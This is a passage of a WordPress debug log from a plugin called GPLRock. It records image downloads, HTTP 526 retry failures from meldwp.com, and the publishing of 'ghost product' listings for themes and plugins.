/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-586beedc.jpg [06-Apr-2026 08:06:01 UTC] GPLRock: Using pre-downloaded image for product cookie-info-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-586beedc.jpg [06-Apr-2026 08:06:01 UTC] GPLRock: Ghost product published with image - Product ID: cookie-info-wp [06-Apr-2026 08:06:03 UTC] GPLRock: Image downloaded successfully for product css-igniter-oscillator-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3914b3cb.jpg [06-Apr-2026 08:06:03 UTC] GPLRock: Using pre-downloaded image for product css-igniter-oscillator-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3914b3cb.jpg [06-Apr-2026 08:06:03 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-oscillator-wordpress-theme [06-Apr-2026 08:06:05 UTC] GPLRock: Image downloaded successfully for product marketing-pro-seo-wordpress-theme-for-seo-agency (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3927f62.jpg [06-Apr-2026 08:06:05 UTC] GPLRock: Using pre-downloaded image for product marketing-pro-seo-wordpress-theme-for-seo-agency: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3927f62.jpg [06-Apr-2026 08:06:05 UTC] GPLRock: Ghost product published with image - Product ID: marketing-pro-seo-wordpress-theme-for-seo-agency [06-Apr-2026 08:06:06 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-drip-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ea4b3a9.jpg [06-Apr-2026 08:06:06 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-drip-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ea4b3a9.jpg [06-Apr-2026 08:06:06 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-drip-content [06-Apr-2026 08:06:08 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-activecampaign (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65474681.jpg [06-Apr-2026 08:06:08 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-activecampaign: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65474681.jpg [06-Apr-2026 08:06:08 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-activecampaign [06-Apr-2026 08:06:10 UTC] GPLRock: Image downloaded successfully for product pw-advanced-woocommerce-reporting (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a13024db.jpg [06-Apr-2026 08:06:10 UTC] GPLRock: Using pre-downloaded image for product pw-advanced-woocommerce-reporting: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a13024db.jpg [06-Apr-2026 08:06:10 UTC] GPLRock: Ghost product published with image - Product ID: pw-advanced-woocommerce-reporting [06-Apr-2026 08:06:12 UTC] GPLRock: Image downloaded successfully for product mythemeshop-style-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e745547.jpg [06-Apr-2026 08:06:12 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-style-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e745547.jpg [06-Apr-2026 08:06:12 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-style-wordpress-theme [06-Apr-2026 08:06:13 UTC] GPLRock: Image downloaded successfully for product ninja-forms-batchbook-crm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f180c40.jpg [06-Apr-2026 08:06:13 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-batchbook-crm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f180c40.jpg [06-Apr-2026 08:06:13 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-batchbook-crm [06-Apr-2026 08:23:37 UTC] GPLRock: Image download failed for product crox-esports-gaming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:39 UTC] GPLRock: Image download failed for product crox-esports-gaming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crox--esports--gaming-wordpress-theme-4304.webp for product crox-esports-gaming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:23:41 UTC] GPLRock: Image download failed for product crox-esports-gaming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:43 UTC] GPLRock: Image download failed for product crox-esports-gaming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crox--esports--gaming-wordpress-theme-4304.webp for product crox-esports-gaming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:23:45 UTC] GPLRock WARNING: Image download failed for product crox-esports-gaming-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crox--esports--gaming-wordpress-theme-4304.webp [06-Apr-2026 08:23:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crox-esports-gaming-wordpress-theme [06-Apr-2026 08:23:45 UTC] GPLRock: Image download failed for product redlight-cyber-security-it-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:47 UTC] GPLRock: Image download failed for product redlight-cyber-security-it-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redlight-cyber-security--it-management-wordpress-theme-9416.webp for product redlight-cyber-security-it-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:23:50 UTC] GPLRock: Image download failed for product redlight-cyber-security-it-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:52 UTC] GPLRock: Image download failed for product redlight-cyber-security-it-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redlight-cyber-security--it-management-wordpress-theme-9416.webp for product redlight-cyber-security-it-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:23:54 UTC] GPLRock WARNING: Image download failed for product redlight-cyber-security-it-management-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/redlight-cyber-security--it-management-wordpress-theme-9416.webp [06-Apr-2026 08:23:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: redlight-cyber-security-it-management-wordpress-theme [06-Apr-2026 08:23:54 UTC] GPLRock: Image downloaded successfully for product industry-press-factory-and-industrial-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21d571ef.webp [06-Apr-2026 08:23:54 UTC] GPLRock: Using pre-downloaded image for product industry-press-factory-and-industrial-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21d571ef.webp [06-Apr-2026 08:23:54 UTC] GPLRock: Ghost product published with image - Product ID: industry-press-factory-and-industrial-business-wordpress-theme [06-Apr-2026 08:23:54 UTC] GPLRock: Image downloaded successfully for product furnitor-minimalism-furniture-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7ab8fde.webp [06-Apr-2026 08:23:54 UTC] GPLRock: Using pre-downloaded image for product furnitor-minimalism-furniture-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7ab8fde.webp [06-Apr-2026 08:23:54 UTC] GPLRock: Ghost product published with image - Product ID: furnitor-minimalism-furniture-store-wordpress-theme [06-Apr-2026 08:23:54 UTC] GPLRock: Image download failed for product playroom-kids-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:56 UTC] GPLRock: Image download failed for product playroom-kids-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playroom---kids--kindergarten-wordpress-theme-6420.webp for product playroom-kids-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:23:58 UTC] GPLRock: Image download failed for product playroom-kids-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:00 UTC] GPLRock: Image download failed for product playroom-kids-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playroom---kids--kindergarten-wordpress-theme-6420.webp for product playroom-kids-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:03 UTC] GPLRock WARNING: Image download failed for product playroom-kids-kindergarten-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/playroom---kids--kindergarten-wordpress-theme-6420.webp [06-Apr-2026 08:24:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: playroom-kids-kindergarten-wordpress-theme [06-Apr-2026 08:24:03 UTC] GPLRock: Image download failed for product dermal-dermatologist-cosmetology-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:05 UTC] GPLRock: Image download failed for product dermal-dermatologist-cosmetology-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dermal---dermatologist--cosmetology-clinic-wordpress-theme-1446.webp for product dermal-dermatologist-cosmetology-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:07 UTC] GPLRock: Image download failed for product dermal-dermatologist-cosmetology-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:09 UTC] GPLRock: Image download failed for product dermal-dermatologist-cosmetology-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dermal---dermatologist--cosmetology-clinic-wordpress-theme-1446.webp for product dermal-dermatologist-cosmetology-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:11 UTC] GPLRock WARNING: Image download failed for product dermal-dermatologist-cosmetology-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dermal---dermatologist--cosmetology-clinic-wordpress-theme-1446.webp [06-Apr-2026 08:24:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dermal-dermatologist-cosmetology-clinic-wordpress-theme [06-Apr-2026 08:24:11 UTC] GPLRock: Image download failed for product aragon-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:14 UTC] GPLRock: Image download failed for product aragon-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aragon---creative-multi-purpose-wordpress-theme-28928.webp for product aragon-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:16 UTC] GPLRock: Image download failed for product aragon-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:18 UTC] GPLRock: Image download failed for product aragon-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aragon---creative-multi-purpose-wordpress-theme-28928.webp for product aragon-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:20 UTC] GPLRock WARNING: Image download failed for product aragon-creative-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aragon---creative-multi-purpose-wordpress-theme-28928.webp [06-Apr-2026 08:24:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aragon-creative-multi-purpose-wordpress-theme [06-Apr-2026 08:24:20 UTC] GPLRock: Image download failed for product gedebvge-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:22 UTC] GPLRock: Image download failed for product gedebvge-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gedebvge---responsive-one-page-portfolio-theme-24331.webp for product gedebvge-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:24 UTC] GPLRock: Image download failed for product gedebvge-responsive-one-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:26 UTC] GPLRock: Image download failed for product gedebvge-responsive-one-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gedebvge---responsive-one-page-portfolio-theme-24331.webp for product gedebvge-responsive-one-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:29 UTC] GPLRock WARNING: Image download failed for product gedebvge-responsive-one-page-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/gedebvge---responsive-one-page-portfolio-theme-24331.webp [06-Apr-2026 08:24:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gedebvge-responsive-one-page-portfolio-theme [06-Apr-2026 08:24:29 UTC] GPLRock: Image download failed for product edutech-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:31 UTC] GPLRock: Image download failed for product edutech-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edutech---education-wordpress-theme-4976.webp for product edutech-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:33 UTC] GPLRock: Image download failed for product edutech-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:35 UTC] GPLRock: Image download failed for product edutech-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edutech---education-wordpress-theme-4976.webp for product edutech-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:37 UTC] GPLRock WARNING: Image download failed for product edutech-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edutech---education-wordpress-theme-4976.webp [06-Apr-2026 08:24:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edutech-education-wordpress-theme [06-Apr-2026 08:24:37 UTC] GPLRock: Image download failed for product sunnyorchard-landscaping-and-gardening-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:39 UTC] GPLRock: Image download failed for product sunnyorchard-landscaping-and-gardening-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sunnyorchard---landscaping-and-gardening-wordpress-theme-9448.webp for product sunnyorchard-landscaping-and-gardening-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:42 UTC] GPLRock: Image download failed for product sunnyorchard-landscaping-and-gardening-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:44 UTC] GPLRock: Image download failed for product sunnyorchard-landscaping-and-gardening-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:24:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sunnyorchard---landscaping-and-gardening-wordpress-theme-9448.webp for product sunnyorchard-landscaping-and-gardening-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:24:46 UTC] GPLRock WARNING: Image download failed for product sunnyorchard-landscaping-and-gardening-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sunnyorchard---landscaping-and-gardening-wordpress-theme-9448.webp [06-Apr-2026 08:24:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sunnyorchard-landscaping-and-gardening-wordpress-theme [06-Apr-2026 08:26:42 UTC] GPLRock: Image download failed for product wordpress-woocommerce-admin-buyer-chat-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:44 UTC] GPLRock: Image download failed for product wordpress-woocommerce-admin-buyer-chat-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-admin-buyer-chat-plugin-2868.webp for product wordpress-woocommerce-admin-buyer-chat-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:26:46 UTC] GPLRock: Image download failed for product wordpress-woocommerce-admin-buyer-chat-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:48 UTC] GPLRock: Image download failed for product wordpress-woocommerce-admin-buyer-chat-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-admin-buyer-chat-plugin-2868.webp for product wordpress-woocommerce-admin-buyer-chat-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:26:50 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-admin-buyer-chat-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-admin-buyer-chat-plugin-2868.webp [06-Apr-2026 08:26:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-admin-buyer-chat-plugin [06-Apr-2026 08:26:50 UTC] GPLRock: Image download failed for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:53 UTC] GPLRock: Image download failed for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qixer---multi-vendor-on-demand-handyman-service-marketplace-and-service-finder-28757.webp for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:26:55 UTC] GPLRock: Image download failed for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:57 UTC] GPLRock: Image download failed for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:26:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qixer---multi-vendor-on-demand-handyman-service-marketplace-and-service-finder-28757.webp for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:26:59 UTC] GPLRock WARNING: Image download failed for product qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder. URL: https://meldwp.com/wp-content/uploads/qixer---multi-vendor-on-demand-handyman-service-marketplace-and-service-finder-28757.webp [06-Apr-2026 08:26:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qixer-multi-vendor-on-demand-handyman-service-marketplace-and-service-finder [06-Apr-2026 08:26:59 UTC] GPLRock: Image download failed for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:01 UTC] GPLRock: Image download failed for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artwork---painting-wall-preview-pupop-plugin--woocommerce-wordpress-28244.webp for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:03 UTC] GPLRock: Image download failed for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:06 UTC] GPLRock: Image download failed for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artwork---painting-wall-preview-pupop-plugin--woocommerce-wordpress-28244.webp for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:08 UTC] GPLRock WARNING: Image download failed for product artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/artwork---painting-wall-preview-pupop-plugin--woocommerce-wordpress-28244.webp [06-Apr-2026 08:27:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artwork-painting-wall-preview-pupop-plugin-woocommerce-wordpress [06-Apr-2026 08:27:08 UTC] GPLRock: Image downloaded successfully for product colibriplus-the-social-network-web-application (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57e74c9b.webp [06-Apr-2026 08:27:08 UTC] GPLRock: Using pre-downloaded image for product colibriplus-the-social-network-web-application: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57e74c9b.webp [06-Apr-2026 08:27:08 UTC] GPLRock: Ghost product published with image - Product ID: colibriplus-the-social-network-web-application [06-Apr-2026 08:27:08 UTC] GPLRock: Image download failed for product wordpress-merge-categories (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:10 UTC] GPLRock: Image download failed for product wordpress-merge-categories (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-merge-categories-23771.webp for product wordpress-merge-categories after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:12 UTC] GPLRock: Image download failed for product wordpress-merge-categories (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:14 UTC] GPLRock: Image download failed for product wordpress-merge-categories (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-merge-categories-23771.webp for product wordpress-merge-categories after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:16 UTC] GPLRock WARNING: Image download failed for product wordpress-merge-categories. URL: https://meldwp.com/wp-content/uploads/wordpress-merge-categories-23771.webp [06-Apr-2026 08:27:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-merge-categories [06-Apr-2026 08:27:17 UTC] GPLRock: Image download failed for product wordpress-popup-plugin-slick-popup-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:19 UTC] GPLRock: Image download failed for product wordpress-popup-plugin-slick-popup-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-popup-plugin---slick-popup-pro-13706.webp for product wordpress-popup-plugin-slick-popup-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:21 UTC] GPLRock: Image download failed for product wordpress-popup-plugin-slick-popup-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:23 UTC] GPLRock: Image download failed for product wordpress-popup-plugin-slick-popup-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-popup-plugin---slick-popup-pro-13706.webp for product wordpress-popup-plugin-slick-popup-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:25 UTC] GPLRock WARNING: Image download failed for product wordpress-popup-plugin-slick-popup-pro. URL: https://meldwp.com/wp-content/uploads/wordpress-popup-plugin---slick-popup-pro-13706.webp [06-Apr-2026 08:27:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-popup-plugin-slick-popup-pro [06-Apr-2026 08:27:25 UTC] GPLRock: Image download failed for product google-analytics-events-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:27 UTC] GPLRock: Image download failed for product google-analytics-events-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-analytics-events-add-on-chauffeur-taxi-booking-system-5730.webp for product google-analytics-events-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:29 UTC] GPLRock: Image download failed for product google-analytics-events-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:32 UTC] GPLRock: Image download failed for product google-analytics-events-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-analytics-events-add-on-chauffeur-taxi-booking-system-5730.webp for product google-analytics-events-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:34 UTC] GPLRock WARNING: Image download failed for product google-analytics-events-add-on-chauffeur-taxi-booking-system. URL: https://meldwp.com/wp-content/uploads/google-analytics-events-add-on-chauffeur-taxi-booking-system-5730.webp [06-Apr-2026 08:27:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: google-analytics-events-add-on-chauffeur-taxi-booking-system [06-Apr-2026 08:27:34 UTC] GPLRock: Image download failed for product magicards-decks-of-cards-to-shuffle-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:36 UTC] GPLRock: Image download failed for product magicards-decks-of-cards-to-shuffle-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magicards---decks-of-cards-to-shuffle--wp-plugin-26070.webp for product magicards-decks-of-cards-to-shuffle-wp-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:38 UTC] GPLRock: Image download failed for product magicards-decks-of-cards-to-shuffle-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:40 UTC] GPLRock: Image download failed for product magicards-decks-of-cards-to-shuffle-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magicards---decks-of-cards-to-shuffle--wp-plugin-26070.webp for product magicards-decks-of-cards-to-shuffle-wp-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:27:42 UTC] GPLRock WARNING: Image download failed for product magicards-decks-of-cards-to-shuffle-wp-plugin. URL: https://meldwp.com/wp-content/uploads/magicards---decks-of-cards-to-shuffle--wp-plugin-26070.webp [06-Apr-2026 08:27:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magicards-decks-of-cards-to-shuffle-wp-plugin [06-Apr-2026 08:27:43 UTC] GPLRock: Image downloaded successfully for product wpqa-builder-forms-addon-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e1aefae.webp [06-Apr-2026 08:27:43 UTC] GPLRock: Using pre-downloaded image for product wpqa-builder-forms-addon-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e1aefae.webp [06-Apr-2026 08:27:43 UTC] GPLRock: Ghost product published with image - Product ID: wpqa-builder-forms-addon-for-wordpress [06-Apr-2026 08:27:43 UTC] GPLRock: Image download failed for product woocommerce-plugin-bundle-elementor-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:27:45 UTC] GPLRock: Image download failed for product woocommerce-plugin-bundle-elementor-addons (attempt 